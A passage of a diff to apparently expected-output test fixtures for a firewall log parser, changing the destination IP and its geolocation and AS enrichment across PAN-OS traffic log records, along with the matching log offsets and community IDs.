+        "event.original": "Oct 30 09:46:12 1,2012/10/30 09:46:12,01606001116,TRAFFIC,start,1,2012/04/10 04:39:57,192.168.0.2,67.43.156.12,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:58,24069,1,59318,80,0,0,0x200000,tcp,allow,78,78,0,1,2012/04/10 04:39:58,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0",
         "event.outcome": "success",
         "event.start": "2012-04-10T04:39:58.000-02:00",
         "event.timezone": "-02:00",
@@ -1051,10 +995,10 @@
         "fileset.name": "panos",
         "input.type": "log",
         "labels.captive_portal": true,
-        "log.offset": 3659,
+        "log.offset": 3647,
         "network.application": "web-browsing",
         "network.bytes": 78,
-        "network.community_id": "1:I7NZAEypUvCTVa5iVWyAsWeEWgY=",
+        "network.community_id": "1:MSgzPne+izDvzh8WO4tIRsclc64=",
         "network.direction": "outbound",
         "network.packets": 1,
         "network.transport": "tcp",
@@ -1086,14 +1030,14 @@
         "related.ip": [
             "0.0.0.0",
             "192.168.0.2",
-            "204.232.231.46"
+            "67.43.156.12"
         ],
         "related.user": [
             "crusher"
         ],
         "rule.name": "rule1",
         "server.bytes": 0,
-        "server.ip": "204.232.231.46",
+        "server.ip": "67.43.156.12",
         "server.packets": 0,
         "server.port": 80,
         "service.type": "panw",
@@ -1116,19 +1060,15 @@
         "client.packets": 1,
         "client.port": 59317,
         "client.user.name": "crusher",
-        "destination.address": "204.232.231.46",
-        "destination.as.number": 27357,
-        "destination.as.organization.name": "Rackspace Hosting",
+        "destination.address": "67.43.156.12",
+        "destination.as.number": 35908,
         "destination.bytes": 0,
-        "destination.geo.city_name": "Fort Lauderdale",
-        "destination.geo.continent_name": "North America",
-        "destination.geo.country_iso_code": "US",
-        "destination.geo.country_name": "United States",
-        "destination.geo.location.lat": 26.1792,
-        "destination.geo.location.lon": -80.1749,
-        "destination.geo.region_iso_code": "US-FL",
-        "destination.geo.region_name": "Florida",
-        "destination.ip": "204.232.231.46",
+        "destination.geo.continent_name": "Asia",
+        "destination.geo.country_iso_code": "BT",
+        "destination.geo.country_name": "Bhutan",
+        "destination.geo.location.lat": 27.5,
+        "destination.geo.location.lon": 90.5,
+        "destination.ip": "67.43.156.12",
         "destination.packets": 0,
         "destination.port": 80,
         "event.action": "flow_started",
@@ -1141,7 +1081,7 @@
         "event.end": "2012-04-10T04:39:57.000-02:00",
         "event.kind": "event",
         "event.module": "panw",
-        "event.original": "Oct 30 09:46:12 1,2012/10/30 09:46:12,01606001116,TRAFFIC,start,1,2012/04/10 04:39:57,192.168.0.2,204.232.231.46,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:58,25848,1,59317,80,0,0,0x200000,tcp,allow,78,78,0,1,2012/04/10 04:39:57,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0",
+        "event.original": "Oct 30 09:46:12 1,2012/10/30 09:46:12,01606001116,TRAFFIC,start,1,2012/04/10 04:39:57,192.168.0.2,67.43.156.12,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:58,25848,1,59317,80,0,0,0x200000,tcp,allow,78,78,0,1,2012/04/10 04:39:57,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0",
         "event.outcome": "success",
         "event.start": "2012-04-10T04:39:57.000-02:00",
         "event.timezone": "-02:00",
@@ -1153,10 +1093,10 @@
         "fileset.name": "panos",
         "input.type": "log",
         "labels.captive_portal": true,
-        "log.offset": 4023,
+        "log.offset": 4009,
         "network.application": "web-browsing",
         "network.bytes": 78,
-        "network.community_id": "1:GOqfpUTezPkpm6axBI22kY90kU4=",
+        "network.community_id": "1:fmI3tKXdcqsY5PoHvFSPPOmDSOc=",
         "network.direction": "outbound",
         "network.packets": 1,
         "network.transport": "tcp",
@@ -1188,14 +1128,14 @@
         "related.ip": [
             "0.0.0.0",
             "192.168.0.2",
-            "204.232.231.46"
+            "67.43.156.12"
         ],
         "related.user": [
             "crusher"
         ],
         "rule.name": "rule1",
         "server.bytes": 0,
-        "server.ip": "204.232.231.46",
+        "server.ip": "67.43.156.12",
         "server.packets": 0,
         "server.port": 80,
         "service.type": "panw",
@@ -1218,19 +1158,15 @@
         "client.packets": 1,
         "client.port": 59316,
         "client.user.name": "crusher",
-        "destination.address": "204.232.231.46",
-        "destination.as.number": 27357,
-        "destination.as.organization.name": "Rackspace Hosting",
+        "destination.address": "67.43.156.12",
+        "destination.as.number": 35908,
         "destination.bytes": 0,
-        "destination.geo.city_name": "Fort Lauderdale",
-        "destination.geo.continent_name": "North America",
-        "destination.geo.country_iso_code": "US",
-        "destination.geo.country_name": "United States",
-        "destination.geo.location.lat": 26.1792,
-        "destination.geo.location.lon": -80.1749,
-        "destination.geo.region_iso_code": "US-FL",
-        "destination.geo.region_name": "Florida",
-        "destination.ip": "204.232.231.46",
+        "destination.geo.continent_name": "Asia",
+        "destination.geo.country_iso_code": "BT",
+        "destination.geo.country_name": "Bhutan",
+        "destination.geo.location.lat": 27.5,
+        "destination.geo.location.lon": 90.5,
+        "destination.ip": "67.43.156.12",
         "destination.packets": 0,
         "destination.port": 80,
         "event.action": "flow_started",
@@ -1243,7 +1179,7 @@
         "event.end": "2012-04-10T04:39:57.000-02:00",
         "event.kind": "event",
         "event.module": "panw",
-        "event.original": "Oct 30 09:46:12 1,2012/10/30 09:46:12,01606001116,TRAFFIC,start,1,2012/04/10 04:39:57,192.168.0.2,204.232.231.46,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:58,25179,1,59316,80,0,0,0x200000,tcp,allow,78,78,0,1,2012/04/10 04:39:57,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0",
+        "event.original": "Oct 30 09:46:12 1,2012/10/30 09:46:12,01606001116,TRAFFIC,start,1,2012/04/10 04:39:57,192.168.0.2,67.43.156.12,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:58,25179,1,59316,80,0,0,0x200000,tcp,allow,78,78,0,1,2012/04/10 04:39:57,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0",
         "event.outcome": "success",
         "event.start": "2012-04-10T04:39:57.000-02:00",
         "event.timezone": "-02:00",
@@ -1255,10 +1191,10 @@
         "fileset.name": "panos",
         "input.type": "log",
         "labels.captive_portal": true,
-        "log.offset": 4387,
+        "log.offset": 4371,
         "network.application": "web-browsing",
         "network.bytes": 78,
-        "network.community_id": "1:aiB5YppFUGX0pM/1Xtp3qOSFXJw=",
+        "network.community_id": "1:R89M2kJolrp3Qf6IPm++vTcewQU=",
         "network.direction": "outbound",
         "network.packets": 1,
         "network.transport": "tcp",
@@ -1290,14 +1226,14 @@
         "related.ip": [
             "0.0.0.0",
             "192.168.0.2",
-            "204.232.231.46"
+            "67.43.156.12"
         ],
         "related.user": [
             "crusher"
         ],
         "rule.name": "rule1",
         "server.bytes": 0,
-        "server.ip": "204.232.231.46",
+        "server.ip": "67.43.156.12",
         "server.packets": 0,
         "server.port": 80,
         "service.type": "panw",
@@ -1320,19 +1256,15 @@
         "client.packets": 1,
         "client.port": 59315,
         "client.user.name": "crusher",
-        "destination.address": "204.232.231.46",
-        "destination.as.number": 27357,
-        "destination.as.organization.name": "Rackspace Hosting",
+        "destination.address": "67.43.156.12",
+        "destination.as.number": 35908,
         "destination.bytes": 0,
-        "destination.geo.city_name": "Fort Lauderdale",
-        "destination.geo.continent_name": "North America",
-        "destination.geo.country_iso_code": "US",
-        "destination.geo.country_name": "United States",
-        "destination.geo.location.lat": 26.1792,
-        "destination.geo.location.lon": -80.1749,
-        "destination.geo.region_iso_code": "US-FL",
-        "destination.geo.region_name": "Florida",
-        "destination.ip": "204.232.231.46",
+        "destination.geo.continent_name": "Asia",
+        "destination.geo.country_iso_code": "BT",
+        "destination.geo.country_name": "Bhutan",
+        "destination.geo.location.lat": 27.5,
+        "destination.geo.location.lon": 90.5,
+        "destination.ip": "67.43.156.12",
         "destination.packets": 0,
         "destination.port": 80,
         "event.action": "flow_started",
@@ -1345,7 +1277,7 @@
         "event.end": "2012-04-10T04:39:57.000-02:00",
         "event.kind": "event",
         "event.module": "panw",
-        "event.original": "Oct 30 09:46:12 1,2012/10/30 09:46:12,01606001116,TRAFFIC,start,1,2012/04/10 04:39:57,192.168.0.2,204.232.231.46,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:58,25112,1,59315,80,0,0,0x200000,tcp,allow,78,78,0,1,2012/04/10 04:39:57,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0",
+        "event.original": "Oct 30 09:46:12 1,2012/10/30 09:46:12,01606001116,TRAFFIC,start,1,2012/04/10 04:39:57,192.168.0.2,67.43.156.12,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:58,25112,1,59315,80,0,0,0x200000,tcp,allow,78,78,0,1,2012/04/10 04:39:57,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0",
         "event.outcome": "success",
         "event.start": "2012-04-10T04:39:57.000-02:00",
         "event.timezone": "-02:00",
@@ -1357,10 +1289,10 @@
         "fileset.name": "panos",
         "input.type": "log",
         "labels.captive_portal": true,
-        "log.offset": 4751,
+        "log.offset": 4733,
         "network.application": "web-browsing",
         "network.bytes": 78,
-        "network.community_id": "1:ghLw4NDj0JmAhH9lVtlhdQpqEQ0=",
+        "network.community_id": "1:ymK/qi8Fj5E3NiB4Zt+MtiJFOHI=",
         "network.direction": "outbound",
         "network.packets": 1,
         "network.transport": "tcp",
@@ -1392,14 +1324,14 @@
         "related.ip": [
             "0.0.0.0",
             "192.168.0.2",
-            "204.232.231.46"
+            "67.43.156.12"
         ],
         "related.user": [
             "crusher"
         ],
         "rule.name": "rule1",
         "server.bytes": 0,
-        "server.ip": "204.232.231.46",
+        "server.ip": "67.43.156.12",
         "server.packets": 0,
         "server.port": 80,
         "service.type": "panw",
@@ -1422,19 +1354,15 @@
         "client.packets": 6,
         "client.port": 59206,
         "client.user.name": "crusher",
-        "destination.address": "204.232.231.46",
-        "destination.as.number": 27357,
-        "destination.as.organization.name": "Rackspace Hosting",
+        "destination.address": "67.43.156.12",
+        "destination.as.number": 35908,
         "destination.bytes": 806,
-        "destination.geo.city_name": "Fort Lauderdale",
-        "destination.geo.continent_name": "North America",
-        "destination.geo.country_iso_code": "US",
-        "destination.geo.country_name": "United States",
-        "destination.geo.location.lat": 26.1792,
-        "destination.geo.location.lon": -80.1749,
-        "destination.geo.region_iso_code": "US-FL",
-        "destination.geo.region_name": "Florida",
-        "destination.ip": "204.232.231.46",
+        "destination.geo.continent_name": "Asia",
+        "destination.geo.country_iso_code": "BT",
+        "destination.geo.country_name": "Bhutan",
+        "destination.geo.location.lat": 27.5,
+        "destination.geo.location.lon": 90.5,
+        "destination.ip": "67.43.156.12",
         "destination.packets": 4,
         "destination.port": 80,
         "event.action": "flow_terminated",
@@ -1447,7 +1375,7 @@
         "event.end": "2012-04-10T04:39:27.000-02:00",
         "event.kind": "event",
         "event.module": "panw",
-        "event.original": "Oct 30 09:46:17 1,2012/10/30 09:46:17,01606001116,TRAFFIC,end,1,2012/04/10 04:39:57,192.168.0.2,204.232.231.46,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:57,26161,1,59206,80,0,0,0x200000,tcp,allow,1355,549,806,10,2012/04/10 04:39:27,0,private-ip-addresses,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,6,4",
+        "event.original": "Oct 30 09:46:17 1,2012/10/30 09:46:17,01606001116,TRAFFIC,end,1,2012/04/10 04:39:57,192.168.0.2,67.43.156.12,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:57,26161,1,59206,80,0,0,0x200000,tcp,allow,1355,549,806,10,2012/04/10 04:39:27,0,private-ip-addresses,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,6,4",
         "event.outcome": "success",
         "event.start": "2012-04-10T04:39:27.000-02:00",
         "event.timezone": "-02:00",
@@ -1459,10 +1387,10 @@
         "fileset.name": "panos",
         "input.type": "log",
         "labels.captive_portal": true,
-        "log.offset": 5115,
+        "log.offset": 5095,
         "network.application": "web-browsing",
         "network.bytes": 1355,
-        "network.community_id": "1:SIxV4kkvJlBljF+gLKAaihputgk=",
+        "network.community_id": "1:1LRVWx60LdA8fxXWzX2/1Tw7z2w=",
         "network.direction": "outbound",
         "network.packets": 10,
         "network.transport": "tcp",
@@ -1494,14 +1422,14 @@
         "related.ip": [
             "0.0.0.0",
             "192.168.0.2",
-            "204.232.231.46"
+            "67.43.156.12"
         ],
         "related.user": [
             "crusher"
         ],
         "rule.name": "rule1",
         "server.bytes": 806,
-        "server.ip": "204.232.231.46",
+        "server.ip": "67.43.156.12",
         "server.packets": 4,
         "server.port": 80,
         "service.type": "panw",
@@ -1524,19 +1452,15 @@
         "client.packets": 6,
         "client.port": 59205,
         "client.user.name": "crusher",
-        "destination.address": "204.232.231.46",
-        "destination.as.number": 27357,
-        "destination.as.organization.name": "Rackspace Hosting",
+        "destination.address": "67.43.156.12",
+        "destination.as.number": 35908,
         "destination.bytes": 806,
-        "destination.geo.city_name": "Fort Lauderdale",
-        "destination.geo.continent_name": "North America",
-        "destination.geo.country_iso_code": "US",
-        "destination.geo.country_name": "United States",
-        "destination.geo.location.lat": 26.1792,
-        "destination.geo.location.lon": -80.1749,
-        "destination.geo.region_iso_code": "US-FL",
-        "destination.geo.region_name": "Florida",
-        "destination.ip": "204.232.231.46",
+        "destination.geo.continent_name": "Asia",
+        "destination.geo.country_iso_code": "BT",
+        "destination.geo.country_name": "Bhutan",
+        "destination.geo.location.lat": 27.5,
+        "destination.geo.location.lon": 90.5,
+        "destination.ip": "67.43.156.12",
         "destination.packets": 4,
         "destination.port": 80,
         "event.action": "flow_terminated",
@@ -1549,7 +1473,7 @@
         "event.end": "2012-04-10T04:39:27.000-02:00",
         "event.kind": "event",
         "event.module": "panw",
-        "event.original": "Oct 30 09:46:17 1,2012/10/30 09:46:17,01606001116,TRAFFIC,end,1,2012/04/10 04:39:57,192.168.0.2,204.232.231.46,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:57,26000,1,59205,80,0,0,0x200000,tcp,allow,1355,549,806,10,2012/04/10 04:39:26,1,private-ip-addresses,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,6,4",
+        "event.original": "Oct 30 09:46:17 1,2012/10/30 09:46:17,01606001116,TRAFFIC,end,1,2012/04/10 04:39:57,192.168.0.2,67.43.156.12,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:57,26000,1,59205,80,0,0,0x200000,tcp,allow,1355,549,806,10,2012/04/10 04:39:26,1,private-ip-addresses,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,6,4",
         "event.outcome": "success",
         "event.start": "2012-04-10T04:39:26.000-02:00",
         "event.timezone": "-02:00",
@@ -1561,10 +1485,10 @@
         "fileset.name": "panos",
         "input.type": "log",
         "labels.captive_portal": true,
-        "log.offset": 5500,
+        "log.offset": 5478,
         "network.application": "web-browsing",
         "network.bytes": 1355,
-        "network.community_id": "1:rpU2pqp4ioYKgiuDEfjZitnLkow=",
+        "network.community_id": "1:j8sr41e7fe8nlNwp3dvDhPoVFLA=",
         "network.direction": "outbound",
         "network.packets": 10,
         "network.transport": "tcp",
@@ -1596,14 +1520,14 @@
         "related.ip": [
             "0.0.0.0",
             "192.168.0.2",
-            "204.232.231.46"
+            "67.43.156.12"
         ],
         "related.user": [
             "crusher"
         ],
         "rule.name": "rule1",
         "server.bytes": 806,
-        "server.ip": "204.232.231.46",
+        "server.ip": "67.43.156.12",
         "server.packets": 4,
         "server.port": 80,
         "service.type": "panw",
@@ -1626,19 +1550,15 @@
         "client.packets": 18,
         "client.port": 56858,
         "client.user.name": "crusher",
-        "destination.address": "204.232.231.46",
-        "destination.as.number": 27357,
-        "destination.as.organization.name": "Rackspace Hosting",
+        "destination.address": "67.43.156.12",
+        "destination.as.number": 35908,
         "destination.bytes": 551,
-        "destination.geo.city_name": "Fort Lauderdale",
-        "destination.geo.continent_name": "North America",
-        "destination.geo.country_iso_code": "US",
-        "destination.geo.country_name": "United States",
-        "destination.geo.location.lat": 26.1792,
-        "destination.geo.location.lon": -80.1749,
-        "destination.geo.region_iso_code": "US-FL",
-        "destination.geo.region_name": "Florida",
-        "destination.ip": "204.232.231.46",
+        "destination.geo.continent_name": "Asia",
+        "destination.geo.country_iso_code": "BT",
+        "destination.geo.country_name": "Bhutan",
+        "destination.geo.location.lat": 27.5,
+        "destination.geo.location.lon": 90.5,
+        "destination.ip": "67.43.156.12",
         "destination.packets": 3,
         "destination.port": 80,
         "event.action": "flow_terminated",
@@ -1651,7 +1571,7 @@
         "event.end": "2012-04-10T04:38:26.000-02:00",
         "event.kind": "event",
         "event.module": "panw",
-        "event.original": "Oct 30 09:46:17 1,2012/10/30 09:46:17,01606001116,TRAFFIC,end,1,2012/04/10 04:39:56,192.168.0.2,204.232.231.46,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:57,65184,1,56858,80,0,0,0x200000,tcp,allow,1910,1359,551,21,2012/04/10 04:29:54,512,malware-sites,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,18,3",
+        "event.original": "Oct 30 09:46:17 1,2012/10/30 09:46:17,01606001116,TRAFFIC,end,1,2012/04/10 04:39:56,192.168.0.2,67.43.156.12,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:57,65184,1,56858,80,0,0,0x200000,tcp,allow,1910,1359,551,21,2012/04/10 04:29:54,512,malware-sites,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,18,3",
         "event.outcome": "success",
         "event.start": "2012-04-10T04:29:54.000-02:00",
         "event.timezone": "-02:00",
@@ -1663,10 +1583,10 @@
         "fileset.name": "panos",
         "input.type": "log",
         "labels.captive_portal": true,
-        "log.offset": 5885,
+        "log.offset": 5861,
         "network.application": "web-browsing",
         "network.bytes": 1910,
-        "network.community_id": "1:JuKJfhPs1pDZMiwy04nz1EsD7PA=",
+        "network.community_id": "1:uHVTJP6Fq0Po1paDP+KSjgNuXMY=",
         "network.direction": "outbound",
         "network.packets": 21,
         "network.transport": "tcp",
@@ -1698,14 +1618,14 @@
         "related.ip": [
             "0.0.0.0",
             "192.168.0.2",
-            "204.232.231.46"
+            "67.43.156.12"
         ],
         "related.user": [
             "crusher"
         ],
         "rule.name": "rule1",
         "server.bytes": 551,
-        "server.ip": "204.232.231.46",
+        "server.ip": "67.43.156.12",
         "server.packets": 3,
         "server.port": 80,
         "service.type": "panw",
@@ -1728,19 +1648,15 @@
         "client.packets": 1,
         "client.port": 59314,
         "client.user.name": "crusher",
-        "destination.address": "204.232.231.46",
-        "destination.as.number": 27357,
-        "destination.as.organization.name": "Rackspace Hosting",
+        "destination.address": "67.43.156.12",
+        "destination.as.number": 35908,
         "destination.bytes": 0,
-        "destination.geo.city_name": "Fort Lauderdale",
-        "destination.geo.continent_name": "North America",
-        "destination.geo.country_iso_code": "US",
-        "destination.geo.country_name": "United States",
-        "destination.geo.location.lat": 26.1792,
-        "destination.geo.location.lon": -80.1749,
-        "destination.geo.region_iso_code": "US-FL",
-        "destination.geo.region_name": "Florida",
-        "destination.ip": "204.232.231.46",
+        "destination.geo.continent_name": "Asia",
+        "destination.geo.country_iso_code": "BT",
+        "destination.geo.country_name": "Bhutan",
+        "destination.geo.location.lat": 27.5,
+        "destination.geo.location.lon": 90.5,
+        "destination.ip": "67.43.156.12",
         "destination.packets": 0,
         "destination.port": 80,
         "event.action": "flow_started",
@@ -1753,7 +1669,7 @@
         "event.end": "2012-04-10T04:39:56.000-02:00",
         "event.kind": "event",
         "event.module": "panw",
-        "event.original": "Oct 30 09:46:17 1,2012/10/30 09:46:17,01606001116,TRAFFIC,start,1,2012/04/10 04:39:56,192.168.0.2,204.232.231.46,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:57,26522,1,59314,80,0,0,0x200000,tcp,allow,78,78,0,1,2012/04/10 04:39:56,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0",
+        "event.original": "Oct 30 09:46:17 1,2012/10/30 09:46:17,01606001116,TRAFFIC,start,1,2012/04/10 04:39:56,192.168.0.2,67.43.156.12,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:57,26522,1,59314,80,0,0,0x200000,tcp,allow,78,78,0,1,2012/04/10 04:39:56,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0",
         "event.outcome": "success",
         "event.start": "2012-04-10T04:39:56.000-02:00",
         "event.timezone": "-02:00",
@@ -1765,10 +1681,10 @@
         "fileset.name": "panos",
         "input.type": "log",
         "labels.captive_portal": true,
-        "log.offset": 6267,
+        "log.offset": 6241,
         "network.application": "web-browsing",
         "network.bytes": 78,
-        "network.community_id": "1:bZl1JgwyPgfsbSrD+z8I/hpbdc4=",
+        "network.community_id": "1:6ykXrYnnXhC2OTYegSkf7HauF6Y=",
         "network.direction": "outbound",
         "network.packets": 1,
         "network.transport": "tcp",
@@ -1800,14 +1716,14 @@
         "related.ip": [
             "0.0.0.0",
             "192.168.0.2",
-            "204.232.231.46"
+            "67.43.156.12"
         ],
         "related.user": [
             "crusher"
         ],
         "rule.name": "rule1",
         "server.bytes": 0,
-        "server.ip": "204.232.231.46",
+        "server.ip": "67.43.156.12",
         "server.packets": 0,
         "server.port": 80,
         "service.type": "panw",
@@ -1830,19 +1746,15 @@
         "client.packets": 1,
         "client.port": 59313,
         "client.user.name": "crusher",
-        "destination.address": "204.232.231.46",
-        "destination.as.number": 27357,
-        "destination.as.organization.name": "Rackspace Hosting",
+        "destination.address": "67.43.156.12",
+        "destination.as.number": 35908,
         "destination.bytes": 0,
-        "destination.geo.city_name": "Fort Lauderdale",
-        "destination.geo.continent_name": "North America",
-        "destination.geo.country_iso_code": "US",
-        "destination.geo.country_name": "United States",
-        "destination.geo.location.lat": 26.1792,
-        "destination.geo.location.lon": -80.1749,
-        "destination.geo.region_iso_code": "US-FL",
-        "destination.geo.region_name": "Florida",
-        "destination.ip": "204.232.231.46",
+        "destination.geo.continent_name": "Asia",
+        "destination.geo.country_iso_code": "BT",
+        "destination.geo.country_name": "Bhutan",
+        "destination.geo.location.lat": 27.5,
+        "destination.geo.location.lon": 90.5,
+        "destination.ip": "67.43.156.12",
         "destination.packets": 0,
         "destination.port": 80,
         "event.action": "flow_started",
@@ -1855,7 +1767,7 @@
         "event.end": "2012-04-10T04:39:56.000-02:00",
         "event.kind": "event",
         "event.module": "panw",
-        "event.original": "Oct 30 09:46:17 1,2012/10/30 09:46:17,01606001116,TRAFFIC,start,1,2012/04/10 04:39:56,192.168.0.2,204.232.231.46,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:57,26067,1,59313,80,0,0,0x200000,tcp,allow,78,78,0,1,2012/04/10 04:39:56,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0",
+        "event.original": "Oct 30 09:46:17 1,2012/10/30 09:46:17,01606001116,TRAFFIC,start,1,2012/04/10 04:39:56,192.168.0.2,67.43.156.12,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:57,26067,1,59313,80,0,0,0x200000,tcp,allow,78,78,0,1,2012/04/10 04:39:56,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0",
         "event.outcome": "success",
         "event.start": "2012-04-10T04:39:56.000-02:00",
         "event.timezone": "-02:00",
@@ -1867,10 +1779,10 @@
         "fileset.name": "panos",
         "input.type": "log",
         "labels.captive_portal": true,
-        "log.offset": 6631,
+        "log.offset": 6603,
         "network.application": "web-browsing",
         "network.bytes": 78,
-        "network.community_id": "1:0fIOSC1t62T9ExNKvZaxl657EVc=",
+        "network.community_id": "1:q5WSywQz9mnveJuMrWqG0rlBf3g=",
         "network.direction": "outbound",
         "network.packets": 1,
         "network.transport": "tcp",
@@ -1902,14 +1814,14 @@
         "related.ip": [
             "0.0.0.0",
             "192.168.0.2",
-            "204.232.231.46"
+            "67.43.156.12"
         ],
         "related.user": [
             "crusher"
         ],
         "rule.name": "rule1",
         "server.bytes": 0,
-        "server.ip": "204.232.231.46",
+        "server.ip": "67.43.156.12",
         "server.packets": 0,
         "server.port": 80,
         "service.type": "panw",
@@ -1933,14 +1845,7 @@
         "client.port": 52139,
         "client.user.name": "crusher",
         "destination.address": "205.171.2.25",
-        "destination.as.number": 209,
-        "destination.as.organization.name": "CenturyLink Communications, LLC",
         "destination.bytes": 0,
-        "destination.geo.continent_name": "North America",
-        "destination.geo.country_iso_code": "US",
-        "destination.geo.country_name": "United States",
-        "destination.geo.location.lat": 37.751,
-        "destination.geo.location.lon": -97.822,
         "destination.ip": "205.171.2.25",
         "destination.packets": 0,
         "destination.port": 53,
@@ -1966,7 +1871,7 @@
         "fileset.name": "panos",
         "input.type": "log",
         "labels.captive_portal": true,
-        "log.offset": 6995,
+        "log.offset": 6965,
         "network.application": "dns",
         "network.bytes": 69,
         "network.community_id": "1:vFErz1cKNExckY21peQ3YAc8Tmk=",
@@ -2032,14 +1937,7 @@
         "client.port": 60592,
         "client.user.name": "crusher",
         "destination.address": "205.171.2.25",
-        "destination.as.number": 209,
-        "destination.as.organization.name": "CenturyLink Communications, LLC",
         "destination.bytes": 0,
-        "destination.geo.continent_name": "North America",
-        "destination.geo.country_iso_code": "US",
-        "destination.geo.country_name": "United States",
-        "destination.geo.location.lat": 37.751,
-        "destination.geo.location.lon": -97.822,
         "destination.ip": "205.171.2.25",
         "destination.packets": 0,
         "destination.port": 53,
@@ -2065,7 +1963,7 @@
         "fileset.name": "panos",
         "input.type": "log",
         "labels.captive_portal": true,
-        "log.offset": 7348,
+        "log.offset": 7318,
         "network.application": "dns",
         "network.bytes": 69,
         "network.community_id": "1:i4rdWjY94ZjxNIBve+QH3YwdL04=",
@@ -2130,19 +2028,15 @@
         "client.packets": 1,
         "client.port": 59309,
         "client.user.name": "crusher",
-        "destination.address": "204.232.231.46",
-        "destination.as.number": 27357,
-        "destination.as.organization.name": "Rackspace Hosting",
+        "destination.address": "67.43.156.12",
+        "destination.as.number": 35908,
         "destination.bytes": 0,
-        "destination.geo.city_name": "Fort Lauderdale",
-        "destination.geo.continent_name": "North America",
-        "destination.geo.country_iso_code": "US",
-        "destination.geo.country_name": "United States",
-        "destination.geo.location.lat": 26.1792,
-        "destination.geo.location.lon": -80.1749,
-        "destination.geo.region_iso_code": "US-FL",
-        "destination.geo.region_name": "Florida",
-        "destination.ip": "204.232.231.46",
+        "destination.geo.continent_name": "Asia",
+        "destination.geo.country_iso_code": "BT",
+        "destination.geo.country_name": "Bhutan",
+        "destination.geo.location.lat": 27.5,
+        "destination.geo.location.lon": 90.5,
+        "destination.ip": "67.43.156.12",
         "destination.packets": 0,
         "destination.port": 80,
         "event.action": "flow_started",
@@ -2155,7 +2049,7 @@
         "event.end": "2012-04-10T04:39:56.000-02:00",
         "event.kind": "event",
         "event.module": "panw",
-        "event.original": "Oct 30 09:46:17 1,2012/10/30 09:46:17,01606001116,TRAFFIC,start,1,2012/04/10 04:39:56,192.168.0.2,204.232.231.46,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:57,25149,1,59309,80,0,0,0x200000,tcp,allow,78,78,0,1,2012/04/10 04:39:56,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0",
+        "event.original": "Oct 30 09:46:17 1,2012/10/30 09:46:17,01606001116,TRAFFIC,start,1,2012/04/10 04:39:56,192.168.0.2,67.43.156.12,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:57,25149,1,59309,80,0,0,0x200000,tcp,allow,78,78,0,1,2012/04/10 04:39:56,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0",
         "event.outcome": "success",
         "event.start": "2012-04-10T04:39:56.000-02:00",
         "event.timezone": "-02:00",
@@ -2167,10 +2061,10 @@
         "fileset.name": "panos",
         "input.type": "log",
         "labels.captive_portal": true,
-        "log.offset": 7701,
+        "log.offset": 7671,
         "network.application": "web-browsing",
         "network.bytes": 78,
-        "network.community_id": "1:mY2EPMYo0US42k87/2uTzjo/rGA=",
